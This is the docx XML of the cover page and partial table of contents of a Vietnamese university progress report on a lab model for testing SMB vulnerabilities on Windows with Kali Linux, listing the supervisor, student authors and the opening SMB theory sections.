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D156" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>BỘ GIÁO DỤC VÀ ĐÀO TẠO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>TRƯỜNG ĐẠI HỌC CÔNG THƯƠNG TP. HỒ CHÍ MINH (HUIT)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>KHOA CÔNG NGHỆ THÔNG TIN – BỘ MÔN AN TOÀN THÔNG TIN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D16C98D" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="720"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>━━━━━━━ ★ ━━━━━━━</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3F030E" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>BÁO CÁO TIẾN ĐỘ ĐỒ ÁN CHUYÊN NGÀNH</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:br/>
        <w:t>NGÀNH AN TOÀN THÔNG TIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5265324F" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="360" w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ĐỀ TÀI:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>XÂY DỰNG MÔ HÌNH KIỂM THỬ LỖ HỔNG SMB TRÊN WINDOWS BẰNG KALI LINUX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F47F537" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="800"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0E7490"/>
        </w:rPr>
        <w:t>HỒ SƠ HỌC THUẬT TOÀN VĂN: CHƯƠNG 1 VÀ CHƯƠNG 2</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3456"/>
        <w:gridCol w:w="5184"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DB6619" w14:paraId="732DD87A" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3456" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="569703C3" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="288" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Giảng viên hướng dẫn:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5184" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A78464C" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="288" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>ThS. Ngô Quốc Huy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB6619" w14:paraId="35F79695" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3456" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40D6BEBA" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="288" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Sinh viên thực hiện 1:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5184" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="095FA989" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="288" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Lâm Gia Bảo  –  MSSV: 2033216350  –  Lớp: 12DHBM03</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB6619" w14:paraId="37AD2AAD" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3456" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7658933D" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="288" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Sinh viên thực hiện 2:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5184" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F158572" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="288" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Nguyễn Minh Thắng  –  MSSV: 2033216558  –  Lớp: 12DHBM03</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB6619" w14:paraId="127B0A7A" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3456" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="094AF489" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="288" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Sinh viên thực hiện 3:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5184" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B93DC67" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="288" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Nguyễn Hoài Tiến  –  MSSV: 2033216575  –  Lớp: 12DHBM09</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB6619" w14:paraId="165FF21D" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3456" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="154DA07F" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="288" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Chuyên ngành đào tạo:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5184" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E12E820" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="288" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>An toàn thông tin (Mã ngành: 7480202)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB6619" w14:paraId="51224392" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3456" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79D7F7E2" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="288" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Khóa học &amp; Niên khóa:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5184" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D4D7F87" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="288" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Đại học chính quy Khóa 12 (2023 – 2027)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2A8716AD" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1200" w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>TP. HỒ CHÍ MINH, NĂM 2026</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7DAE23" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8E2C89" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="240" w:after="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>MỤC LỤC TỔNG QUÁT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4F69F9" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00DB6619">
      <w:pPr>
        <w:spacing w:after="40" w:line="300" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DA14602" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>CHƯƠNG 1. CƠ SỞ LÝ THUYẾT VÀ CÔNG CỤ KIỂM THỬ SMB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A0A0A0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> ·························· </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Trang 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F077851" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">  1.1. Tổng quan về giao thức SMB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A0A0A0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> ·········································· </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Trang 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9FA11A" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">    1.1.1. Khái niệm và vai trò của SMB trong hệ điều hành Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A0A0A0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> ········· </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Trang 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F44EF1" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRPr="009A434D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40" w:line="288" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">1.1.2. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Mô</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>hình</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> Client – Server</w:t>
      </w:r>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:color w:val="A0A0A0"/>
          <w:sz w:val="20"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> ········································· </w:t>
      </w:r>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="22"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Trang 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31854DFE" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRPr="009A434D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40" w:line="288" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">    1.1.3. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Phân</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>biệt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> SMBv1, SMBv2 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>và</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> SMBv3</w:t>
      </w:r>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:color w:val="A0A0A0"/>
          <w:sz w:val="20"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> ································· </w:t>
      </w:r>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="22"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Trang 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620DC5F7" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRPr="009A434D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40" w:line="288" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">    1.1.4. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Phân</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>tích</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>cổng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>mạng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> TCP 139 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>và</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> TCP 445</w:t>
      </w:r>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:color w:val="A0A0A0"/>
          <w:sz w:val="20"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> ·························· </w:t>
      </w:r>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="22"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Trang 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45707384" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRPr="009A434D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40" w:line="288" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">    1.1.5. Quy </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>trình</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>trao</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>đổi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>bản</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> tin </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>cơ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>bản</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:color w:val="A0A0A0"/>
          <w:sz w:val="20"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> ······························· </w:t>
      </w:r>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="22"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Trang 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060C602E" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRPr="009A434D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40" w:line="288" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">  1.2. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Phân</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>tích</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>nhóm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>lỗ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>hổng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
